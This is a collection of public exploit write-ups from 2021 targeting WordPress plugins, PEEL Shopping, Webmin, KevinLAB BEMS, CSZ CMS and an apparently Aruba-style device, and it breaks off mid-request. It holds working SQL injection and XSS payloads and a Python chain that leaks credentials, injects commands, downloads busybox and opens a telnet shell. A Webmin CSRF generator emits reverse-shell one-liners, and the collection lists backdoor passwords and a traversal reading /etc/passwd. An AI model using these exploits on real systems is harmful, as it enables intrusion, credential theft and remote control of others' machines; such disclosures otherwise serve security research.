
# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.8
# References link: https://wpscan.com/vulnerability/10208
# CVE: CVE-2020-6010

POC:
1. Go to url http://<host>/wp-admin
2. Log in with valid credentials
3. Execute the payload


POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 128
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145

type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -

# Modify current_items[] as you want
            
import socket
import sys
import struct
import time
import threading
import urllib3
import re
import telnetlib
import xml.etree.ElementTree as ET
import requests

# Silence urllib3's warnings; every HTTPS call in this script passes verify=False.
urllib3.disable_warnings()

# Loop flag for the background thread: read by race_papi_message(), cleared by main().
CONTINUE_RACE = True
# Total length that prepare_upload_id() pads its result up to. The name suggests a
# fixed-size buffer on the target, which cannot be verified from this file.
SNPRINTF_CREATEFILE_MAX_LENGTH = 245


def race_papi_message(ip):
    """Send one fixed UDP datagram to ``ip``:8211 in a tight loop until ``CONTINUE_RACE`` is cleared.

    Runs as the background thread started by ``main()``; ``main()`` sets the
    global to False once its polling loop sees the leaked configuration, which
    ends this loop. A fresh socket is created and closed for every datagram.

    Args:
        ip: Target host address.
    """

    global CONTINUE_RACE

    # Fixed header bytes. Their field meaning is not derivable from this file;
    # the two 4-byte 0x7F000001 runs read as 127.0.0.1 in network byte order.
    payload = b"\x49\x72"
    payload += b"\x00\x03"
    payload += b"\x7F\x00\x00\x01"
    payload += b"\x7F\x00\x00\x01"
    payload += b"\x00\x00"
    payload += b"\x00\x00"
    payload += b"\x3B\x7E"
    payload += b"\x41\x41"
    payload += b"\x04\x22"
    payload += b"\x00\x00"
    payload += b"\x02\x00"
    payload += b"\x00\x00"
    payload += b"\x00" * 12 * 4  # 48 zero bytes of padding
    # The text body (including its terminating NUL) is XOR-ed byte-wise with 0x93.
    text_to_send = bytes()
    for i in "msg_ref 3000 /tmp/cfg-plaintext\x00":
        text_to_send += struct.pack("B", int(ord(i)) ^ 0x93)

    packet = payload + text_to_send

    # ~4 ms between sends; nothing inside this function ever ends the loop,
    # only main() clearing CONTINUE_RACE does.
    while CONTINUE_RACE:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect((ip, 8211))
        s.send(packet)
        s.close()
        time.sleep(0.004)


def find_credentials(text):
    """Return ``(username, password)`` taken from the first ``mgmt-user`` line in ``text``.

    The match runs from ``mgmt-user`` to the end of that line and is split on
    single spaces; the second and third fields are returned. If no such line
    exists, ``re.search`` yields ``None`` and indexing it raises ``TypeError``.
    """
    matched_line = re.search("mgmt-user .*", text).group(0)
    fields = matched_line.split(" ")
    username, password = fields[1], fields[2]
    return (username, password)


def login(ip, username, password):
    """POST a login form to ``swarm.cgi`` and return the session id from the XML reply.

    Args:
        ip: Target host; the request goes to ``https://<ip>:4343/swarm.cgi``
            with certificate verification disabled.
        username: Login name, normally from ``find_credentials()``.
        password: Password, normally from ``find_credentials()``.

    Returns:
        The text of the ``<data name="sid">`` element in the response body.

    Raises:
        xml.etree.ElementTree.ParseError: if the body is not well-formed XML.
        AttributeError: if no ``sid`` element is present (``find`` returns None).
    """
    login_data = {
            "opcode": "login",
            "user": username,
            "passwd": password,
            "refresh": "false",
    }
    res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=login_data, verify=False)

    root = ET.fromstring(res.text)
    return root.find("./data[@name='sid']").text


def create_directory(ip, sid):
    """Issue an ``opcode=config`` request meant to create ``/tmp/oper_/`` on the target.

    The body is a pre-encoded string rather than a dict, so ``requests`` sends
    it verbatim. Its ``cmd`` field carries an ``apply cplogo-install`` command
    whose quoted URL argument embeds a ``--directory-prefix /tmp/oper_/``
    option, separated by URL-encoded tabs (``%09``).

    Args:
        ip: Target host; also interpolated into the URL inside ``cmd``.
        sid: Session id returned by ``login()``.

    Returns:
        True if the response text contains ``/tmp/oper_``, else False.
    """
    request_data = "opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\"'&refresh=false&sid={sid}&nocache=0.23759201691110987&=".format(ip=ip, sid=sid)
    res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=request_data, verify=False)
    # Success is inferred solely from the path being echoed in the response body.
    if "/tmp/oper_" in res.text:
        print("[+] Successfully created /tmp/oper_/ directory :)")
        return True
    else:
        print("[-] Failed creating /tmp/oper_/ directory")
        return False


def prepare_upload_id(command):
    """Build the padded ``upload_id`` string consumed by ``create_file()``.

    The result is ``base_payload`` + a run of ``/`` + ``A`` + ``'; <command> #.gz``,
    padded so its total length equals ``SNPRINTF_CREATEFILE_MAX_LENGTH``. The 8
    reserved bytes are ``'; `` (3), `` #`` (2) and ``.gz`` (3).

    Args:
        command: Shell command text to embed.

    Returns:
        The padded upload_id string.

    Exits the process with status 1 (builtin ``exit``, not ``sys.exit``) when
    ``command`` is too long to leave room for padding; note the message prints
    the negative ``padding_len`` rather than the command length.
    """
    base_payload = "/../../etc/httpd/"
    cmd_len = len(command)
    padding_len = SNPRINTF_CREATEFILE_MAX_LENGTH - cmd_len - len(base_payload) - 8  # for the .gz at the end and the '; + spaces
    if padding_len < 0:
        print("[-] Command too long length:{}".format(padding_len))
        exit(1)
    return base_payload + ('/' * (padding_len - 1)) + 'A' + "'; {} #.gz".format(command)    


def create_file(ip, command):
    """POST a ``cp-upload`` request whose ``upload_id`` is derived from ``command``.

    The multipart body carries a fixed, arbitrary-looking ``sid``
    (``basdfbsfbsfb``) instead of the real session id, plus a dummy ``file``
    field. The HTTP response is discarded, so failures are not reported.

    Args:
        ip: Target host.
        command: Shell command text handed to ``prepare_upload_id()``.
    """
    upload_id = prepare_upload_id(command)
    requests.post("https://{}:4343/swarm.cgi".format(ip), data={"opcode": "cp-upload", "file_type": "logo", "upload_id": upload_id, "sid": "basdfbsfbsfb"}, files={"file": "test2"}, verify=False)


def run_command(ip, command):
    """GET ``https://<ip>:4343/A';%20<command>%20%23`` and return the response body.

    ``?`` and ``#`` in ``command`` are rewritten first (``?`` to ``%3F``; ``#``
    to two backslashes followed by ``x23``). The request is built as a
    ``PreparedRequest`` and sent through a ``Session`` with certificate
    verification off. The "Executing telnet" message is printed here even
    though this function only performs the HTTP request.

    Args:
        ip: Target host.
        command: Command text, normally the output of ``build_command()``.

    Returns:
        ``response.text``.
    """
    print("[*] Executing telnet")
    command = command.replace("?", "%3F")
    command = command.replace("#", "\\\\x23")
    s = requests.Session()
    req = requests.Request('GET', "https://{}:4343/A';%20{}%20%23".format(ip, command))
    prep = req.prepare()
    response = s.send(prep, verify=False)
    return response.text

def build_command(command):
    """Wrap ``command`` as ``echo -e "<escaped>"|sh``.

    Before wrapping, ``/`` and ``#`` are replaced by two backslashes followed
    by ``x2F`` / ``x23``, and ``"`` gets a backslash in front of it. The backtick
    replacement is written as a backslash before a backtick, which is not a
    recognised Python escape and therefore stays as those two characters
    (newer Pythons emit a warning for it).

    Args:
        command: Raw shell command text.

    Returns:
        The wrapped command string.
    """
    command = command.replace("/", "\\\\x2F")
    command = command.replace("#", "\\\\x23")
    command = command.replace("\"", "\\\"")
    command = command.replace("`", "\`")
    final_command = "echo -e \"{}\"|sh".format(command)
    return final_command

def telnet_connect(router_ip):
    """Open a telnet session to ``router_ip``:22222, send one cleanup line, then hand the console to the user.

    The single line written removes ``/etc/httpd/A*sh*.gz`` — presumably the
    file that ``create_file()`` staged — and ``interact()`` then ties stdin/stdout
    to the session until it closes. ``telnetlib`` is deprecated since Python 3.11
    and removed in 3.13.

    Args:
        router_ip: Host to connect to.
    """
    print("[*] Connecting to telnet")
    with telnetlib.Telnet(router_ip, 22222) as tn:
        tn.write(b"rm /etc/httpd/A*sh*.gz\n")
        tn.interact()


def main():
    """Run the whole chain: race the config leak, log in, stage a file, trigger it, attach via telnet.

    The target address is read from ``sys.argv[1]`` (IndexError when missing).
    Steps:
      1. Start ``race_papi_message()`` in a background thread.
      2. Poll ``swarm.cgi?opcode=single_signon`` every 0.1 s until the body
         contains "version", then clear ``CONTINUE_RACE`` to stop the thread.
      3. Pull the ``SESSION_ID`` block out of that body and parse credentials.
      4. Log in, create ``/tmp/oper_/``, stage and trigger the command, then
         connect to the telnet listener it starts on port 22222.
    """

    global CONTINUE_RACE

    ip = sys.argv[1]

    print("[*] Starting the PAPI race thread")
    papi_thread = threading.Thread(target=race_papi_message, args=(ip, ))
    papi_thread.start()

    # A requests exception here (e.g. the 3 s timeout) propagates out of main()
    # without clearing CONTINUE_RACE, so the race thread keeps the process alive.
    while CONTINUE_RACE:
        time.sleep(0.1)
        res = requests.get("https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1".format(ip), timeout=3, verify=False)
        if "version" in res.text:
            print("[+] Successfully leaked the password from config")
            CONTINUE_RACE = False

    # `res` is the last polled response; re.S (DOTALL) lets '.*?' span newlines.
    file_content = re.findall("var SESSION_ID = '(.*?)';", res.text, re.S)[0]
    user, password = find_credentials(file_content)

    # Note: recovered credentials are written to stdout in clear text.
    print("[+] Successfully extracted username: {} and password: {}".format(user, password))
    sid = login(ip, user, password)
    print("[*] SID generated: {}".format(sid))

    # Command staged on the target; build_command() escapes it for `echo -e`.
    command = """cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh"""
    final_command = build_command(command)

    if not create_directory(ip, sid):
        return

    print("[*] Creating malicious file in /etc/httpd/")
    create_file(ip, final_command)
    print(run_command(ip, final_command))
    time.sleep(1) # Sleeping waiting for telnet.
    telnet_connect(ip)


# Script entry point.
if __name__ == "__main__":
    main()
            
# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.9
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
# CVE: CVE-2020-11511

POC:
1. Find out your user id
2. Log in with your credentials
3. Execute the payload


http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>

# Done!
            
# Exploit Title: WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)
# Date: 19/07/2021
# Exploit Author: Aakash Choudhary
# Software Link: https://wordpress.org/plugins/kn-fix-your/
# Version: 1.0.1
# Category: Web Application
# Tested on Mac

How to Reproduce this Vulnerability:

1. Install WordPress 5.7.2
2. Install and activate KN Fix Your Title
3. Navigate to Fix Title under Settings Tab >> Click on I have done this and enter the XSS payload into the Separator input field.
4. Click Save Changes.
5. You will observe that the payload is stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears.
6. Payload Used: "><script>alert(document.cookie)</script>
            
# Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection
# Date: 2021-07-10
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.peel.fr
# Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download
# Version: prior to 9.4.0
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/advisto/peel-shopping/issues/3
# CVE: CVE-2021-37593


################
# Description  #
################

# PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting. An unauthenticated public user/guest can inject a malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon a successful SQL injection attack, an attacker can read sensitive data from the database or modify database data.


#####################
# PoC of detection  #
#####################

1) Assuming the out-of-the-box peel-shopping_9_4_0 installation uses the database name "peel": this query checks whether database() is LIKE hex(%peel%). A 7-second delay before the redirect to the homepage (http://localhost/peel-shopping_9_4_0/) indicates a TRUE SQL condition, which means the database name is like "peel".

PoC #1) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)
Request: The response duration = 418 bytes | 7,719 millis
========

GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0

---

2) Assuming the site uses a MariaDB database server: this checks whether the database version is LIKE hex(%MariaDB%); it delays for 5 seconds if TRUE.

PoC #2) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)
Request: The response duration = 418 bytes | 5,112 millis
========

GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0

---

3) By default, the database has a table named peel_produits. This query checks whether the table peel_produits exists; it delays for 10 seconds if TRUE, otherwise it redirects to the homepage instantly.

PoC #3) param id - time-based SQLi
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)
Request: The response duration = 418 bytes | 10,140 millis
========

GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/peel-shopping_9_4_0/
DNT: 1
Connection: close
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0

---

# For more explanation, refer to the GitHub issue on peel-shopping at https://github.com/advisto/peel-shopping/issues/3.
# The affected versions are prior to 9.4.0. It is fixed in version 9.4.0.1.
# The vendor has released the patched version 9.4.0.1, which is available for download from sourceforge.net [https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download]
            
# Exploit Title: WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)
# Date: 18/07/2021
# Exploit Author: Vikas Srivastava
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/mimetic-books/
# Version: 0.2.13
# Category: Web Application
# Tested on Mac

How to Reproduce this Vulnerability:

1. Install WordPress 5.7.2
2. Install and activate Mimetic Books
3. Navigate to Settings >> Mimetic Books API and enter the XSS payload into the Default Publisher ID input field.
4. Click Save Changes.
5. You will observe that the payload is stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears.
6. Payload Used: "><script>alert(document.cookie)</script>
            
# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)
# Date: 24/04/2021
# Exploit Author: Mesh3l_911 & Z0ldyck
# Vendor Homepage: https://www.webmin.com
# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761
# Version: Webmin 1.973
# Tested on: All versions <= 1.973
# CVE: CVE-2021-31761
# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to
# get a Remote Command Execution (RCE) through the Webmin's running process
# feature

import time, subprocess,random,urllib.parse


# Banner: bold-white ANSI sequence around the ASCII art, reset at the end.
print('''\033[1;37m

 __  __           _     ____  _          _________  _     _            _    
|  \/  |         | |   |___ \| |        |___  / _ \| |   | |          | |   
| \  / | ___  ___| |__   __) | |           / / | | | | __| |_   _  ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| |          / /| | | | |/ _` | | | |/ __| |/ /
| |  | |  __/\__ \ | | |___) | |  _ _    / /_| |_| | | (_| | |_| | (__|   < 
|_|  |_|\___||___/_| |_|____/|_| (_|_)  /_____\___/|_|\__,_|\__, |\___|_|\_/
                                                             __/ |          
                                                            |___/           

    \033[1;m''')

# Cosmetic 0–100 % progress line: 101 iterations of 20 ms each, overwriting
# the same line with '\r' and no newline until the final print.
for i in range(101):
    print(
        "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m )  & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m  ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
            i), "\033[1;36m%\033[1;m", end="")
    time.sleep(0.02)
print("\n\n")

# Base URL of the Webmin instance; 'tunnel/link.cgi/' is appended so that the
# result always ends in exactly one '/' before that path.
target = input(
    "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")

if target.endswith('/'):
    target = target + 'tunnel/link.cgi/'
else:
    target = target + '/tunnel/link.cgi/'

# Listener address and port used by Netcat_listener() and by every command template.
# Both are kept as strings; the port is never validated as a number.
ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")

port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")

# Menu choice, read as the raw string the user typed.
ReverseShell = input \
('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m

\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')

# Random 0–999 suffix for the temporary FIFO name used by option 1 only.
file_name = random.randrange(1000)

# Map the menu choice to its command string; each template interpolates ip and
# port (option 1 also uses file_name). An unrecognised choice only prints a
# message and does not exit, so ReverseShell then keeps the raw menu input.
if ReverseShell == '1':
    ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''

elif ReverseShell == '2':
    ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''

elif ReverseShell == '3':
    ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''

elif ReverseShell == '4':
    ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''

elif ReverseShell == '5':
    ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''

else:
    print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")


def CSRF_Generator():
    """Print the CSRF link: the module-level ``target`` followed by the URL-encoded HTML page.

    Reads the globals ``target`` and ``ReverseShell`` set at import time. The
    embedded page sets ``<meta name="referrer" content="never">``, rewrites
    the history entry to ``/``, and contains a form posting to ``/proc/run.cgi``
    with ``cmd`` = ``ReverseShell``, ``mode`` = ``0`` and ``user`` = ``root``; the
    trailing script submits that form as soon as the page is parsed.
    ``ReverseShell`` is interpolated into the ``value`` attribute without any
    HTML escaping.
    """
    Payload = urllib.parse.quote('''

<html>
        <head>
            <meta name="referrer" content="never">
        </head>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="/proc/run.cgi" method="POST">
      <input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
      <input type="hidden" name="mode" value="0" />
      <input type="hidden" name="user" value="root" />
      <input type="hidden" name="input" value="" />
      <input type="hidden" name="undefined" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>

</html>

        ''')

    print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")

    print(target+Payload)

def Netcat_listener():
    """Run ``nc`` as a listener on the module-level ``port`` and block until it exits.

    The flags and the port are passed as one argv element (``"-nlvp <port>"``)
    rather than as separate arguments; whether ``nc`` accepts that depends on
    its option parser. The return code is not checked.
    """
    print()
    subprocess.run(["nc", "-nlvp "+port+""])


def main():
    """Print the CSRF link, then start the listener (which blocks until ``nc`` exits)."""
    CSRF_Generator()
    Netcat_listener()


# Script entry point; the prompts above already ran at import time.
if __name__ == '__main__':
    main()
            
# Exploit Title: KevinLAB BEMS 1.0 - Undocumented Backdoor Account
# Date: 05.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kevinlab.com

Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)

Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
management platform. KevinLAB's BEMS (Building Energy Management System) enables
efficient energy management in buildings. It improves the efficiency of energy use
by collecting and analyzing various information of energy usage and facilities in
the building. It also manages energy usage, facility efficiency and indoor environment
control.

Desc: The BEMS solution has an undocumented backdoor account, and this set of
credentials is never exposed to the end-user and cannot be changed through any
normal operation of the solution through the RMI. An attacker could exploit this
vulnerability by logging in using the backdoor account with the highest privileges
for administration and gain full system control. The backdoor user cannot be
seen in the user settings of the admin panel, and it also uses an undocumented
privilege level (admin_pk=1) which allows full availability of the features that
the BEMS offers remotely.

Tested on: Linux CentOS 7
           Apache 2.4.6
           Python 2.7.5
           PHP 5.4.16
           MariaDB 5.5.68


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5654
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php


05.07.2021

--


Backdoor accounts from the DB:
------------------------------

Username: kevinlab (permission=1)
Password: kevin003

Username: developer1 (permission=6)
Password: 1234
            
# Exploit Title: KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)
# Date: 05.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kevinlab.com

Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)

Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
management platform. KevinLAB's BEMS (Building Energy Management System) enables
efficient energy management in buildings. It improves the efficiency of energy use
by collecting and analyzing various information of energy usage and facilities in
the building. It also manages energy usage, facility efficiency and indoor environment
control.

Desc: The BEMS suffers from an authenticated arbitrary file disclosure vulnerability.
Input passed through the 'page' GET parameter in index.php is not properly verified
before being used to include files. This can be exploited to disclose the contents
of arbitrary and sensitive files via directory traversal attacks.

Tested on: Linux CentOS 7
           Apache 2.4.6
           Python 2.7.5
           PHP 5.4.16
           MariaDB 5.5.68


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5656
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5656.php


05.07.2021

--


GET https://192.168.1.3/pages/index.php?page=../../../../etc/passwd HTTP/1.1

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
...
...
            
# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion
# Date: 2021-07-20
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.cszcms.com
# Software Link: https://sourceforge.net/projects/cszcms/files/latest/download
# Version: 1.2.9
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/cskaza/cszcms/issues/32


################
# Description  #
################

# CSZ CMS is an open source Content Management System web application that allows managing all content and settings on a website. CSZ CMS was built on the basis of Codeigniter3 with a Bootstrap3 structure. When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input may affect part or all of the affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has permission to delete). Furthermore, an attacker might leverage arbitrary file deletion to circumvent certain web server security mechanisms, for example by deleting the .htaccess file that enforces those constraints.


##########
# PoC 1  #
##########

Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/editArtSave
Vulnerable Code: line 116, 131 - cszcms\models\plugin\Article_model.php

Steps to Reproduce:

1. Login as admin
2. Goto Plugin Manager > Article > edit any article
3. Upload any image as "Main Picture" and "File Upload" and click save button
4. Click "Delete File" button for both "Main Picture" and "File Upload" and click save button
5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_file2"


1) Assumed there are files conf_secret_file.php and config_backup.txt in web root

PoC #1) param del_file & del_file2 - Deleting conf_secret_file.php and config_backup.txt files in web root

Request: 
========

POST /CSZCMS-V1.2.9/admin/plugin/article/editArtSave/4 HTTP/1.1
Host: localhost
Content-Length: 2048
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMyATk1BfQaBOHvY
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
